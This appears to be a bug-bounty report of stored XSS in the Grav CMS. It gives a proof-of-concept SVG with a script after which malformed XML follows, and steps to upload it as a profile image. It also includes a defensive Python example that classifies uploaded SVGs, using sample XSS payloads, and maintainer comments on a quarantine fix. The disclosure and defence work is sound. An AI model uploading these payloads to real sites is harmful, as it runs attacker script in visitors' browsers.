Cross-site Scripting (XSS) - Stored in getgrav/grav
Reported on Jul 1st 2021
✍️ Description
Grav is vulnerable to stored XSS via malformed SVG files. It is possible to upload an SVG file that contains XML errors after its script tags, and the script it carries is still delivered to visitors.
🕵️♂️ Proof of Concept
SVG file content:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert(document.domain);
</script>
<error>
</svg>
- Create an SVG file with the above content.
- Upload it through profile image update.
- Open the target URL.
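The proof of concept relies on an SVG that is not well-formed XML (the unclosed `<error>` element after the script), which is exactly the input a sanitizer is most likely to fail on. The following is an added example, not code from the Grav project or from this report, of how an upload handler can triage SVG files so that a parse failure never results in the raw file being served: a strict XML parse comes first, a parse error sends the file to quarantine for review (the approach the maintainer describes in the comments), and a file that does parse is walked for script elements, event-handler attributes and script URLs. The function names `classify_svg`, `local_name` and `run_samples` are assumptions for this example; the sample inputs are constructed here, with `POC_SVG` copied from the report above.

```python
import xml.etree.ElementTree as ET
from typing import Dict, Tuple

# Elements that can execute script or embed foreign content in an SVG.
FORBIDDEN_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object"}


def local_name(qualified: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return qualified.rsplit("}", 1)[-1] if qualified.startswith("{") else qualified


def classify_svg(data: bytes) -> Tuple[str, str]:
    """Decide what to do with an uploaded SVG.

    Returns (verdict, reason), where verdict is one of:
      "accept"     - well-formed and free of script-bearing constructs
      "reject"     - well-formed but carries script or an event handler
      "quarantine" - the strict parser could not process it, so no sanitizer
                     output is trustworthy; hold it for an admin to review
    """
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        # The malformed-tag case from the report: a lenient sanitizer may fail
        # here and hand back nothing, so never fall back to the raw bytes.
        return "quarantine", f"not well-formed XML: {exc}"

    if local_name(root.tag) != "svg":
        return "reject", f"root element is <{local_name(root.tag)}>, not <svg>"

    for el in root.iter():  # iter() includes the root element itself
        name = local_name(el.tag)
        if name in FORBIDDEN_ELEMENTS:
            return "reject", f"forbidden element <{name}>"
        for attr, value in el.attrib.items():
            aname = local_name(attr).lower()
            if aname.startswith("on"):
                return "reject", f"event handler {aname} on <{name}>"
            # Collapse whitespace so split-up scheme names still match.
            compact = "".join(value.split()).lower()
            if compact.startswith(("javascript:", "data:text/html")):
                return "reject", f"script URL in {aname} on <{name}>"
    return "accept", "no script-bearing constructs found"


# Constructed sample inputs. POC_SVG is the file content from the report above.
POC_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert(document.domain);
</script>
<error>
</svg>"""

# Same payload but well-formed: the parser succeeds, so the walk must catch it.
SCRIPT_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg">
<rect width="10" height="10"/><script>alert(document.domain);</script></svg>"""

# Script delivered through an event handler attribute instead of an element.
ONLOAD_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)">
<rect width="10" height="10"/></svg>"""

# A benign avatar-style SVG that should pass.
CLEAN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="64" height="64">
<circle cx="32" cy="32" r="30" fill="#3366cc"/></svg>"""


def run_samples() -> Dict[str, str]:
    """Classify every constructed sample and return name -> verdict."""
    samples = {"poc": POC_SVG, "script": SCRIPT_SVG,
               "onload": ONLOAD_SVG, "clean": CLEAN_SVG}
    return {name: classify_svg(data)[0] for name, data in samples.items()}


if __name__ == "__main__":
    for name, verdict in run_samples().items():
        print(f"{name:>7}: {verdict}")
```

The important design choice is the three-way verdict: "reject" and "accept" are decisions the code can justify, but a parse failure is not evidence either way, so it becomes "quarantine" rather than a silent pass-through. The `on*` attribute rule is deliberately broad (it also catches non-handler attributes that happen to start with `on`), which is the right trade-off for user-uploaded profile images.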
💥 Impact
This vulnerability allows attacker-supplied JavaScript to execute in the browser of anyone who views the uploaded SVG, in the origin of the Grav site.
Occurrences
Hey Renan, how's it going my friend? I've just emailed the maintainer and am waiting to hear back. Good job!
Thank you for this, Renan. We went with a slightly different patch where instead of emptying the file we move it into a quarantine folder. It is less drastic of an approach and gives the admins the opportunity to review the files. Sometimes SVG sanitization might fail even if the file is not malicious.
You can check out the commit here https://github.com/getgrav/grav/commit/8af1229f6518c496d0c49aa1c9ff3e31b110ac7a
Thanks! Djamil